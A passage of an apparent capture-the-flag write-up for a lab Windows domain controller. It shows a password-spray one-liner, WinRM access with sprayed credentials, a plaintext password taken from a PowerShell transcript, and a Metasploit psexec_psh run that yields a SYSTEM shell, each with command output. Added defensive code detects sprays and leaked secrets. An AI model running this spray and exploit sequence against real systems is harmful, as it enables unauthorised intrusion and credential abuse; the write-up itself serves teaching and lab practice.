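Added example, not code from the original post. It parses ldapsearch LDIF
output, joins folded continuation lines, decodes base64 ('::') values and
reports entries whose description/info/comment attribute mentions a password.
"""
import base64
import re

# Constructed sample modelled on the write-up's ldapsearch output; the svc-demo
# entry and its base64-encoded description are invented for this example.
_B64_DESC = base64.b64encode(b"Temporary pwd: Demo-Only-1 (constructed)").decode()
SAMPLE_LDIF = f"""\
# extended LDIF
#
# megabank.local
dn: DC=megabank,DC=local
objectClass: top

# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: user
cn: Marko Novak
description: Account created. Password set to Welcome123!
distinguishedName: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,D
 C=local
sAMAccountName: marko

dn: CN=svc-demo,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: user
description:: {_B64_DESC}
sAMAccountName: svc-demo

dn: CN=Sunita,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: user
description: Finance team
sAMAccountName: sunita
"""

ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")
PASSWORD_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


def unfold(text):
    """Join LDIF continuation lines (a line starting with one space continues the previous)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return entries as {attr_lowercase: [values]}; base64 ('::') values are decoded."""
    entries, current = [], None
    for line in unfold(text):
        if not line.strip():  # blank line terminates an entry
            if current:
                entries.append(current)
            current = None
            continue
        if line.startswith("#"):  # ldapsearch comments
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if attr == "dn":  # a dn line always starts a new entry
            if current:
                entries.append(current)
            current = {}
        if current is None:
            continue
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def find_credential_hints(text, attrs=("description", "info", "comment")):
    """Return (account, attribute, value) for watched attributes that mention a password."""
    hits = []
    for entry in parse_ldif(text):
        name = entry.get("samaccountname", entry.get("dn", ["?"]))[0]
        for attr in attrs:
            for value in entry.get(attr, []):
                if PASSWORD_HINT.search(value):
                    hits.append((name, attr, value))
    return hits


if __name__ == "__main__":
    for account, attr, value in find_credential_hints(SAMPLE_LDIF):
        print(f"{account}: {attr} = {value!r}")
```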
LDAPDOMAINDUMP
This attempt relied on a bash one-liner, shown below:
# for user in $(cat Resolute_users.txt);do echo 'Connecting with user ' $user; ldapdomaindump -u MEGABANK\\$user -p 'Welcome123!' ldap://resolute.htb:389; done
root@kali:~/Documents/HTB-Labs/Resolute# for user in $(cat Resolute_users.txt);do echo 'Connecting with user ' $user; ldapdomaindump -u MEGABANK\\$user -p 'Welcome123!' ldap://resolute.htb:389; done
Connecting with user Administrator
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user Guest
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user krbtgt
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user DefaultAccount
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user ryan
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user marko
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user sunita
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user abigail
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user marcus
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user sally
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user fred
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user angela
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user felicia
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user gustavo
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user ulf
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user stevie
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user claire
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user paulo
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user steve
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user annette
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user annika
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user per
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user claude
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user melanie
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Connecting with user zach
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user simon
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user naoki
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
As you can see, the user melanie appears to be a match for Welcome123!.
Connecting with user melanie
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
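As an added example (my own code, not part of the original writeup or of ldapdomaindump), here is a small parser for this style of bind output that decodes the AcceptSecurityContext sub-code, so a bad password is not confused with a disabled or locked-out account, together with the check a defender applies to the same signal: one bind per many distinct users with almost all of them failing is a spray, not a typo. The sample output is constructed, including a 775 lockout that the real run above did not produce.

```python
import re

# Well-known AcceptSecurityContext sub-codes that Active Directory embeds in an
# LDAP result-49 message; 52e is what every failed bind above came back with.
AD_BIND_SUBCODES = {
    "525": "user not found", "52e": "invalid credentials",
    "530": "logon hours violation", "531": "workstation restriction",
    "532": "password expired", "533": "account disabled",
    "701": "account expired", "773": "must reset password",
    "775": "account locked out",
}
USER_RE = re.compile(r"^Connecting with user (\S+)")
DATA_RE = re.compile(r"AcceptSecurityContext error, data ([0-9a-f]+),")

def parse_bind_attempts(output):
    """Map each user in ldapdomaindump-style output to its bind outcome."""
    results, user = {}, None
    for line in output.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            results[user] = "no response"
        elif user and line.startswith("[+] Bind OK"):
            results[user] = "ok"
        elif user and "'result': 49" in line:
            m = DATA_RE.search(line)
            results[user] = AD_BIND_SUBCODES.get(m.group(1), "unknown") if m else "unknown"
    return results

def looks_like_spray(results, min_users=5, min_fail_ratio=0.8):
    """One bind per many distinct users, nearly all failing, is the shape of a
    password spray; a user mistyping a password fails repeatedly on one account."""
    if len(results) < min_users:
        return False
    failed = sum(1 for outcome in results.values() if outcome != "ok")
    return failed / len(results) >= min_fail_ratio

def _attempt(user, code=None):
    """Constructed output in the format of the run above (not a real capture)."""
    if code is None:
        return f"Connecting with user {user}\n[+] Bind OK\n[+] Domain dump finished\n"
    return (f"Connecting with user {user}\n[!] Could not bind with specified credentials\n"
            "[!] {'result': 49, 'description': 'invalidCredentials', 'message': "
            f"'8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data {code}, v3839'}}\n")

# Five bad passwords, one hit, and a 775 lockout that a spray can itself trigger.
SAMPLE = ("".join(_attempt(u, "52e") for u in ["stevie", "claire", "paulo", "steve", "zach"])
          + _attempt("melanie") + _attempt("naoki", "775"))
```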
We can first try this user/password combination against SMB; unfortunately it leads nowhere, but the smbmap attempt is shown below as an example.
root@kali:~/Documents/HTB-Labs/Resolute# smbmap -H resolute.htb -u "MEGABANK/melanie" -p "Welcome123!"
[+] Finding open SMB ports....
[!] Authentication error on resolute.htb
[!] Authentication error on resolute.htb
So let's take a look at some of the files created by ldapdomaindump. First, we'll look at domain_users_by_group.html.
Focusing on Remote Management Users, the group that grants the permissions needed to access the system remotely over WinRM, we see the user melanie and the group Contractors. This means we can attempt to access the system through WinRM as melanie (whose password we have) and as any user that is a member of Contractors.
Let's see what the domain_users.html file has to say about the users that are members of the Contractors group.
Let's also look for any other group memberships back in domain_users_by_group.html.
And we see the Contractors group as a member of the DNSAdmins group. This means any user in Contractors inherits DNSAdmins membership and can abuse it to escalate to Administrator rights.
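To make that nesting explicit, here is an added example (my own code, not ldapdomaindump's) that walks group membership transitively and reports the users who hold both remote access and a privileged membership, which is the combination that turns one leaked password into a full compromise. The GROUPS map is a constructed simplification of what the HTML reports above show, not ldapdomaindump's actual JSON schema.

```python
# Constructed group -> direct-member map for the memberships found above
# (a simplification; the real ldapdomaindump JSON stores these as LDAP attributes).
GROUPS = {
    "Remote Management Users": ["melanie", "Contractors"],
    "DNSAdmins": ["Contractors"],
    "Contractors": ["ryan"],
    "Domain Users": ["melanie", "ryan", "stevie"],
}

def effective_members(groups, group, _path=()):
    """Return {user: chain} for every user that is transitively a member of
    `group`; the chain shows the nesting that grants it. Cycle-safe."""
    path = _path + (group,)
    found = {}
    for member in groups.get(group, []):
        if member in groups:                 # a nested group, recurse into it
            if member in path:               # ignore A -> B -> A loops
                continue
            for user, chain in effective_members(groups, member, path).items():
                found.setdefault(user, chain)
        else:                                # a user; keep the first chain seen
            found.setdefault(member, path + (member,))
    return found

def remote_users_with_privilege(groups, remote_group, privileged_group):
    """Users who can both log on remotely and hold the privileged membership,
    each with the two chains that grant those rights."""
    remote = effective_members(groups, remote_group)
    privileged = effective_members(groups, privileged_group)
    return {u: (remote[u], privileged[u]) for u in sorted(set(remote) & set(privileged))}

if __name__ == "__main__":
    report = remote_users_with_privilege(GROUPS, "Remote Management Users", "DNSAdmins")
    for user, (via_remote, via_priv) in report.items():
        print(user, "|", " > ".join(via_remote), "|", " > ".join(via_priv))
```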
Exploitation and Gaining Access
Let's attempt to gain access as melanie through WinRM using evil-winrm; her membership in Remote Management Users means access through WinRM should be possible.
EVIL-WINRM
root@kali:~/Documents/HTB-Labs/Resolute# evil-winrm -i resolute.htb -u melanie -p 'Welcome123!' -s ./ps1_scripts/ -e ./exe_files/
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> dir
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> ls
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt
*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3be*********************978540
*Evil-WinRM* PS C:\Users\melanie\Desktop>
Well, not only did we gain access, we also found the user.txt flag file!
Privilege Escalation
Since we gained access, we need to find ways to escalate privileges. At this point it is too early to try anything, as we only have one set of credentials for a user whose only access is through WinRM. So let's keep enumerating!
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path c:\ -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/7/2020 5:35 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path c:\PSTranscripts -Force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path c:\PSTranscripts\20191203 -Force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> download c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Info: Downloading c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Info: Download successful!
We found a directory called PSTranscripts, which sounded interesting given what a PowerShell transcript file is. So when we go through this PowerShell transcript file after downloading it, we find ryan and his password in cleartext:
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
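Since transcripts like this are plain text files readable by anyone who can reach the directory, here is an added example (not from the writeup) of the sweep a defender can run over a transcript directory to find and redact leaked secrets before they sit there for months. The transcript excerpt is constructed around the net use line above, and the three patterns are heuristics I am assuming, not an exhaustive list.

```python
import re

# Heuristic patterns for secrets that end up in PowerShell transcripts; each
# captures the secret in group 1. Assumed patterns, not a complete catalogue.
PATTERNS = [
    ("net use with inline password",
     re.compile(r"""net use\s+\S+\s+\\\\\S+(?:\s+\S+)*\s+(?!/)([^\s"']+)["']?$""", re.I)),
    ("/password: argument", re.compile(r"""/password:([^\s"']+)""", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"""ConvertTo-SecureString\s+(?:-String\s+)?['"]?([^'"\s]+)['"]?\s+-AsPlainText""", re.I)),
]

def redact(secret):
    """Keep two characters so the finding can be matched to its source."""
    return secret[:2] + "*" * (len(secret) - 2)

def scan_transcript(text):
    """Return (line_no, label, redacted_line) for every transcript line that
    appears to carry a credential; the first matching pattern wins."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for label, rx in PATTERNS:
            m = rx.search(line.rstrip())
            if m:
                findings.append((n, label, line.replace(m.group(1), redact(m.group(1)))))
                break
    return findings

# Constructed transcript excerpt; the net use line is the one quoted above.
SAMPLE = r"""**********************
Windows PowerShell transcript start
Username: MEGABANK\ryan
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!"
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
$cred = ConvertTo-SecureString 'Summer2019!' -AsPlainText -Force
net use Y: \\fs01\public
"""

if __name__ == "__main__":
    for n, label, line in scan_transcript(SAMPLE):
        print(f"line {n}: {label}: {line}")
```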
After seeing that the user ryan is a member of the Contractors group, and that this group is in turn a member of the DNSAdmins group, it is clear this is the user whose membership we could try to abuse to escalate privileges. One avenue is to load an arbitrary DLL with SYSTEM privileges on the DNS server, for which I provided a link as a reference.
This is the route a lot of HTB users took; I moved away from relying on the write privileges to the DNS server object that ryan gets through these group memberships.
Rather than going the DNSAdmins route, we can try a simpler method with Metasploit: the psexec_psh exploit will try to create a service on the host that runs a defined payload.
That being said, I'm not saying my approach is better; I'm simply sticking to the goal, which is escalating privileges by whatever means necessary.
Let's try this:
METASPLOIT
root@kali:~/Documents/HTB-Labs/Resolute# msfconsole
msf5 > use exploit/windows/smb/psexec_psh
msf5 exploit(windows/smb/psexec_psh) > set RHOSTS 10.10.10.169
RHOSTS => 10.10.10.169
msf5 exploit(windows/smb/psexec_psh) > set TARGET 0
TARGET => 0
msf5 exploit(windows/smb/psexec_psh) > set SMBDomain MEGABANK
SMBDomain => MEGABANK
msf5 exploit(windows/smb/psexec_psh) > set LHOST 10.10.14.28
LHOST => 10.10.14.28
msf5 exploit(windows/smb/psexec_psh) > set SMBUser ryan
SMBUser => ryan
msf5 exploit(windows/smb/psexec_psh) > set DryRun false
DryRun => false
msf5 exploit(windows/smb/psexec_psh) > set LPORT 17663
LPORT => 17663
msf5 exploit(windows/smb/psexec_psh) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec_psh) > set RPORT 445
RPORT => 445
msf5 exploit(windows/smb/psexec_psh) > set SMBPass Serv3r4Admin4cc123!
SMBPass => Serv3r4Admin4cc123!
msf5 exploit(windows/smb/psexec_psh) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
[*] 10.10.10.169:445 - Executing the payload...
[+] 10.10.10.169:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.10.10.169:17663
[*] Sending stage (180291 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.14.28:22135 -> 10.10.10.169:17663) at 2020-01-07 23:11:49 -0500
meterpreter >
And we have a Meterpreter Shell, which also means the credentials found for the user ryan were good.
METERPRETER
Using Meterpreter we can do a lot of things, but in this case let's simply see what system information we can get, such as the user this shell is running as.
meterpreter > sysinfo
Computer : RESOLUTE
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : MEGABANK
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Here we can see that privilege escalation worked using just psexec_psh, as we are running this Meterpreter session as NT AUTHORITY\SYSTEM. Let's use the shell Meterpreter command to drop to a command prompt on this host; something I didn't have to do, but it is worth showing that you can.
meterpreter > shell
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 923F-3611
Directory of C:\Users\Administrator\Desktop
12/04/2019 05:18 AM <DIR> .
12/04/2019 05:18 AM <DIR> ..
12/03/2019 07:32 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 30,996,488,192 bytes free
C:\Users\Administrator\Desktop> type root.txt
e1d94**********************e619c
At this point, we got the root flag and owned the system. Goal Achieved!